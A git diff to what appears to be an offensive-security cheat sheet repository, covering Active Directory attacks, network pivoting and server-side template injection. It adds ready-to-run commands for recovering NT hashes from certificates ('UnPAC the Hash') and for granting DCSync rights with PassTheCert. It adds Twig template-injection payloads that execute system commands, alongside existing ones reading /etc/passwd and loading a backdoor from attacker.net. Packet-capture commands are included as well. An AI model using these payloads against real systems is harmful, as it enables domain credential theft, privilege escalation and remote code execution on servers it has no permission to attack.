diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 6af65bd..8d4e0b0 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -62,7 +62,6 @@
 - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
 - [Using impacket](#using-impacket)
 - [Using Rubeus](#using-rubeus)
- - [UnPAC The Hash](#unpac-the-hash)
 - [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes)
 - [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes)
 - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
@@ -84,6 +83,7 @@
 - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
 - [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
 - [Pass-The-Certificate](#pass-the-certificate)
+ - [UnPAC The Hash](#unpac-the-hash)
 - [Shadow Credentials](#shadow-credentials)
 - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
 - [Abusing DNS Admins Group](#abusing-dns-admins-group)
@@ -1915,21 +1915,6 @@ root@kali:~$ klist
 .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
 ```
-### UnPAC The Hash
-
-* Windows
- ```ps1
- # request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
- C:/> Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
- ```
-* Linux
- ```ps1
- # obtain a TGT by validating a PKINIT pre-authentication
- $ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
-
- # use the session key to recover the NT hash
- $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
- ```
 ### Capturing and cracking Net-NTLMv1/NTLMv1 hashes
@@ -2516,6 +2501,8 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
 #### Pass-The-Certificate
+> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential"
+
 * Windows
 ```ps1
 # Information about a cert file
@@ -2523,6 +2510,11 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
 # From a Base64 PFX
 Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
+
+ # Grant DCSync rights to an user
+ ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --sid
+ # To restore
+ ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt
 ```
 * Linux
 ```ps1
@@ -2534,8 +2526,30 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
 # PFX certificate (file) + password (string, optionnal)
 gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
+
+ # Using Certipy
+ certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain'
+ certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
 ```
+### UnPAC The Hash
+
+Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.
+
+* Windows
+ ```ps1
+ # Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
+ Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
+ ```
+* Linux
+ ```ps1
+ # Obtain a TGT by validating a PKINIT pre-authentication
+ $ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
+
+ # Use the session key to recover the NT hash
+ $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
+ ```
+
 ### Shadow Credentials
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 35db818..48b3358 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md
+++ b/Methodology and Resources/Network Pivoting Techniques.md
@@ -20,6 +20,7 @@
 * [RevSocks](#revsocks)
 * [plink](#plink)
 * [ngrok](#ngrok)
+* [Capture a network trace with builtin tools](#capture-a-network-trace-with-builtin-tools)
 * [Basic Pivoting Types](#basic-pivoting-types)
 * [Listen - Listen](#listen---listen)
 * [Listen - Connect](#listen---connect)
@@ -410,7 +411,39 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
 # Expose accessible internal service to the internet
 ./cloudflared tunnel --url ://:
 ```
-
+
+## Capture a network trace with builtin tools
+
+* Windows (netsh)
+ ```ps1
+ # start a capture use the netsh command.
+ netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384
+
+ # stop the trace
+ netsh trace stop
+
+ # Event tracing can be also used across a reboots
+ netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384
+
+ # To open the file in Wireshark you have to convert the etl file to the cap file format. Microsoft has written a convert for this task. Download the latest version.
+ etl2pcapng.exe c:\trace.etl c:\trace.pcapng
+
+ # Use filters
+ netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384
+ ```
+* Linux (tcpdump)
+ ```ps1
+ sudo apt-get install tcpdump
+ tcpdump -w 0001.pcap -i eth0
+ tcpdump -A -i eth0
+
+ # capture every TCP packet
+ tcpdump -i eth0 tcp
+
+ # capture everything on port 22
+ tcpdump -i eth0 port 22
+ ```
+
 ## Basic Pivoting Types
@@ -456,3 +489,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
 * 🇫🇷 [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) - 🇺🇸 [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/)
 * [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
 * [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory)
+* [Windows: Capture a network trace with builtin tools (netsh) - February 22, 2021 Michael Albert](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/)
\ No newline at end of file
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 79f9bfc..a9b4398 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -829,6 +829,9 @@ $output = $twig > render (
 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
 {{['id']|filter('system')}}
+{{[0]|reduce('system','id')}}
+{{['id']|map('system')|join}}
+{{['id',1]|sort('system')|join}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
 ```